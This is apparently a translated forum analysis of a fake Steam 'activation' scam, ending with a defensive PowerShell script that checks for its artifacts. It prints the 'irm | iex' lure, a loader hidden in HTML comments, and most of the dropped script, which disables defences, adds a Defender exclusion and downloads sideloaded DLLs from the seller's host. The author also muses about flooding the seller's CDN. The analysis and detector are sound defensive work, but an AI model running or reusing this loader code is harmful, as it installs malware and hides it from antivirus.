Analysis of a fake Steam "activation" tool


The PDD (Pinduoduo) seller's fake activation asks you to run this command:

irm steam.*** | iex 

I tried opening this steam site directly in a browser: it redirects straight to the real Steam, so that line of thinking was wrong. Then I dropped the pipe `|` and saw that what came back was still HTML, which looked off, so I took the whole output of

irm steam.*** 

and dumped it into vscode, folded the html, and found this:


#>

irm steam.***/pwsDwFile/new -OutFile x.ps1

powershell.exe -ExecutionPolicy Bypass -File x.ps1;

<#

It uses powershell with the execution policy bypassed. I didn't spot the problem at first; I stared at the html for a long time and was nearly stumped: can code really be hidden inside html? Eventually I reasoned backwards: whatever runs next has to be executed by powershell, so I searched for the keyword powershell and it turned up the two lines above. The first one was actually hidden inside the html, while the second one was not hidden at all; folding the html in vscode shows powershell right away. Note the `#>` before them and the `<#` after them: when the whole response is piped into iex, the surrounding HTML sits inside PowerShell block comments and only these two lines are executed.
Following up on x.ps1:

cls

$filePathToDelete = Join-Path $env:USERPROFILE "x.ps1"
if (Test-Path $filePathToDelete) {Remove-Item -Path $filePathToDelete}
$desktopFilePathToDelete = Join-Path ([System.Environment]::GetFolderPath('Desktop')) "x.ps1"
if (Test-Path $desktopFilePathToDelete) {Remove-Item -Path $desktopFilePathToDelete}

It deletes itself.

$steamRegPath = 'HKCU:\Software\Valve\Steam'

It looks up the Steam install path:

$localPath = -join ($env:LOCALAPPDATA,"\SteamActive")
if ((Test-Path $steamRegPath)) {
    $properties = Get-ItemProperty -Path $steamRegPath
    if ($properties.PSObject.Properties.Name -contains 'SteamPath') {$steamPath = $properties.SteamPath}
}

It makes the user run it as administrator:

if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {Write-Host "[请重新打开 Power shell 打开方式以管理员身份运行]" -ForegroundColor:red
    exit
}

function PwStart() {
    if (Get-Process "360Tray*" -ErrorAction Stop) {
        while (Get-Process 360Tray* -ErrorAction Stop) {
            Write-Host "[请先退出 360 安全卫士]" -ForegroundColor:Red
            Start-Sleep 1.5
        }
        PwStart
    }
    if (Get-Process "360sd*" -ErrorAction Stop) {
        while (Get-Process 360sd* -ErrorAction Stop) {
            Write-Host "[请先退出 360 杀毒]" -ForegroundColor:Red
            Start-Sleep 1.5
        }
        PwStart
    }

This line is strange: there was no Steam in my VM, so did it simply never run?

    if ($steamPath -eq ""){Write-Host "[请检查您的 Steam 是否正确安装]" -ForegroundColor:Red
        exit
    }

It kills Steam:

    Write-Host "[ServerStart        OK]" -ForegroundColor:green
    Stop-Process -Name steam* -Force -ErrorAction Stop
    Start-Sleep 2
    if(Get-Process steam* -ErrorAction Stop){
        TASKKILL /F /IM "steam.exe" | Out-Null
        Start-Sleep 2
    }

    if (!(Test-Path $localPath)) {
        md $localPath | Out-Null
        if (!(Test-Path $localPath)) {New-Item $localPath -ItemType directory -Force | Out-Null}
    }

    $catchPath = -join ($steamPath,"packagedata")
    if ((Test-Path $catchPath)) {if ((Test-Path $catchPath)) {Remove-Item $catchPath -Recurse -Force | Out-Null}
    }

It adds an AV exclusion (the whole Steam directory is excluded from Defender):

    try{
        Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop
        Start-Sleep 3
    }catch{}

    Write-Host "[Result->0          OK]" -ForegroundColor:green

It deletes other people's dlls?

    try{
        $d = $steamPath + "/version.dll"
        if (Test-Path $d) {Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null} # remove the file
        $d = $steamPath + "/user32.dll"
        if (Test-Path $d) {Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null} # remove the file
        $d = $steamPath + "/hid.dll"
        if (Test-Path $d) {Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null} # remove the file
    }catch{Write-Host "[异常残留请检查 [$d] 文件是否异常!]" -ForegroundColor:red
        exit
    }

It downloads "pdfs" as a disguise? By the way, guys, does anyone have a tool for hammering a network? I'm honestly tempted to blast his CDN clean, but it is rate-limited to 2m and one thread per IP.

    $downloadData = "http://steam.***/pwsDwFile/bcfc1e52ca77ad82122dfe4c9560f3ec.pdf"
    $downloadLink = "http://steam.***/pwsDwFile/9b96dab2bb0ba18d56068fabc5b17185.pdf"
    
    irm -Uri $downloadLink -OutFile $d -ErrorAction Stop
    Write-Host "[Result->1          OK]" -ForegroundColor:green
    $d = $localPath + "/hid"
    irm -Uri $downloadData -OutFile $d -ErrorAction Stop
    Write-Host "[Result->2          OK]" -ForegroundColor:green
    
    Start-Sleep 1

It restarts Steam:

    Start steam://
    Write-Host "[连接服务器成功请在 Steam 输入激活码 3 秒后自动关闭]" -ForegroundColor:green
    Start-Sleep 3
    exit
}

Looking at the whole thing, it only adds two files to Steam, yet there doesn't seem to be any injection going on. My understanding is that when a DLL is needed, the DLL in the program's own directory is loaded and executed first? That would explain why only two files need to be added.
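As an added check from the defender's side (not part of this post or of the seller's script), the PowerShell below looks for exactly the artifacts the script leaves behind: the Defender exclusion on the Steam directory, the dropped hid.dll / version.dll / user32.dll next to steam.exe, and the second download stored as %LOCALAPPDATA%\SteamActive\hid. The function name and the output fields are my own; the registry key and paths are the ones used in x.ps1.

```powershell
# Added example: enumerate what the fake-activation script above leaves on a machine.
# Function name and output shape are assumptions; paths come from the analysed script.
function Find-SteamSideloadArtifacts {
    $findings = @()
    $norm = { param($p) ($p -replace '/', '\').TrimEnd('\').ToLowerInvariant() }

    # 1. Locate Steam the same way the script does: HKCU\Software\Valve\Steam\SteamPath
    $regPath = 'HKCU:\Software\Valve\Steam'
    $steamPath = $null
    if (Test-Path $regPath) {
        $steamPath = (Get-ItemProperty -Path $regPath -ErrorAction SilentlyContinue).SteamPath
    }
    if (-not $steamPath) { return $findings }   # no Steam install, nothing to check
    $steamPath = $steamPath -replace '/', '\'   # SteamPath in the registry uses forward slashes

    # 2. The script excludes the whole Steam directory from Defender (Add-MpPreference).
    $exclusions = (Get-MpPreference -ErrorAction SilentlyContinue).ExclusionPath
    foreach ($ex in @($exclusions)) {
        if ((& $norm $ex) -eq (& $norm $steamPath)) {
            $findings += [pscustomobject]@{ Type = 'DefenderExclusion'; Path = $ex
                Detail = 'Remove with: Remove-MpPreference -ExclusionPath <path>' }
        }
    }

    # 3. DLLs placed in the application directory are found before System32 for names
    #    outside the KnownDLLs list, which is how a dropped hid.dll gets loaded by steam.exe.
    foreach ($name in 'hid.dll', 'version.dll', 'user32.dll') {
        $dll = Join-Path $steamPath $name
        if (Test-Path $dll) {
            $sig = Get-AuthenticodeSignature -FilePath $dll
            $findings += [pscustomobject]@{ Type = 'SideloadDll'; Path = $dll
                Detail = "Authenticode: $($sig.Status)" }
        }
    }

    # 4. The other downloaded "pdf" is written to %LOCALAPPDATA%\SteamActive\hid.
    $payload = Join-Path $env:LOCALAPPDATA 'SteamActive\hid'
    if (Test-Path $payload) {
        $hash = (Get-FileHash -Path $payload -Algorithm SHA256).Hash
        $findings += [pscustomobject]@{ Type = 'DroppedPayload'; Path = $payload
            Detail = "SHA256: $hash" }
    }
    return $findings
}

Find-SteamSideloadArtifacts | Format-Table -AutoSize
```

Run it from an elevated PowerShell so Get-MpPreference can read the exclusion list; an empty table means none of the four artifacts is present.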
